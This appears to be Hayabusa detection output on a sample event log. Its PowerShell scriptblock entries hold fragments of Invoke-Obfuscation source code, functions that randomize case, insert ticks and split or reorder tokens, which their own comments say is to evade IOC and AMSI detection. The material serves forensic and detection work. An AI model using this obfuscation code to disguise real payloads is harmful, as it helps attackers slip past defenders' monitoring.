obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since 